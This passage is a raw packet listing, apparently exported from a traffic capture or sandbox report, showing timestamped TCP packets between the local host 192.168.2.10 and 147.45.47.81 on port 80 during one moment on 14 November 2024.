                                                                                                                                                                                                            Nov 14, 2024 12:20:00.245318890 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.245330095 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.245343924 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.245342970 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.245354891 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.245366096 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.245376110 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.245381117 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.245387077 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.245397091 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.245407104 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.245410919 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.245418072 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.245426893 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.245440960 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.245480061 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.245491028 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.245501041 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.245501995 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.245512009 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.245522976 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.245532036 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.245543003 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.245544910 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.245553017 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.245563030 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.245569944 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.245573044 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.245583057 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.245589018 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.245594978 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.245604038 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.245625019 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.245626926 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.245637894 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.245646954 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.245651007 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.245657921 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.245659113 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.245790958 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.245815039 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.245825052 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.245953083 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.245965004 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.245974064 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.245991945 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.246002913 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.246012926 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.246016979 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.246023893 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.246033907 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.246041059 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.246045113 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.246054888 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.246059895 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.246064901 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.246121883 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.246121883 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.246140957 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.246156931 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.246170998 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.246185064 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.246293068 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.246304035 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.246313095 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.246315956 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.246323109 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.246335030 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.246337891 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.246345043 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.246350050 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.246362925 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.246373892 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.246382952 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.246387959 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.246422052 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.246475935 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.246486902 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.246496916 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.246503115 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.246507883 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.246517897 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.246527910 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.246537924 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.246543884 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.246543884 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.246547937 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.246572971 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.246608019 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.246619940 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.246629000 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.246637106 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.246640921 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.246656895 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.246666908 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.246668100 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.246678114 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.246681929 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.246764898 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.246812105 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.246824026 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.246833086 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.246845007 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.246854067 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.246860027 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.246865034 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.246877909 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.246890068 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.246978045 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.246989012 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.246999025 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.246999979 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.247014999 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.247021914 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.247026920 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.247071028 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.247107983 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.247118950 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.247128963 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.247138023 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.247143984 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.247153997 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.247164011 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.247168064 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.247174978 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.247190952 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.247203112 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.247251987 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.247263908 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.247275114 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.247286081 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.247297049 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.247317076 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.247323036 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.247330904 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.247342110 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.247344017 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.247351885 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.247369051 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.247397900 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.247498989 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.247512102 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.247522116 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.247534990 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.247545958 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.247556925 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.247566938 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.247576952 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.247586966 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.247586966 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.247596025 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.247598886 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.247610092 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.247616053 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.247672081 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.247672081 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.247684002 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.247694969 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.247705936 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.247715950 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.247725964 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.247735023 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.247746944 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.247756004 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.247761011 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.247766972 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.247776985 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.247778893 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.247787952 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.247798920 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.247805119 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.247817039 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.247826099 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.247828960 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.247838974 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.247848988 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.247859001 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.247864008 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.247870922 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.247881889 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.247890949 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.247901917 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.247911930 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.247921944 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.247931957 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.247942924 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.247952938 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.247957945 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.247961998 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.247961998 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.247968912 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.247978926 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.247982025 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.247991085 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.248001099 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.248009920 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.248012066 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.248022079 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.248033047 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.248034954 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.248034954 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.248043060 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.248051882 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.248063087 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.248064041 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.248076916 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.248080969 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.248087883 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.248097897 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.248105049 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.248107910 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.248120070 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.248131990 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.248136997 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.248143911 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.248157978 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.248171091 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.248172998 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.248181105 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.248191118 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.248192072 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.248202085 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.248213053 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.248222113 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.248231888 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.248236895 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.248243093 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.248262882 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.248265028 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.248281002 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.248291016 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.248301029 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.248311996 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.248322010 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.248332024 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.248342037 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.248352051 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.248361111 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.248363018 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.248370886 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.248373985 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.248383999 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.248393059 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.248397112 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.248411894 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.248416901 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.248423100 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.248424053 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.248435020 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.248446941 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.248459101 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.248459101 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.248475075 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.248480082 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.248486042 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.248496056 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.248497963 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.248507023 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.248516083 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.248522043 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.248528004 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.248537064 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.248548031 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.248558044 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.248568058 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.248579979 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.248614073 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.248614073 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.257921934 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.259181023 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.265245914 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.265259981 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.265270948 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.265471935 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.266350031 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.266366005 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.266376972 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.266387939 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.266397953 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.266401052 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.266408920 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.266419888 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.266429901 CET8049958147.45.47.81192.168.2.10
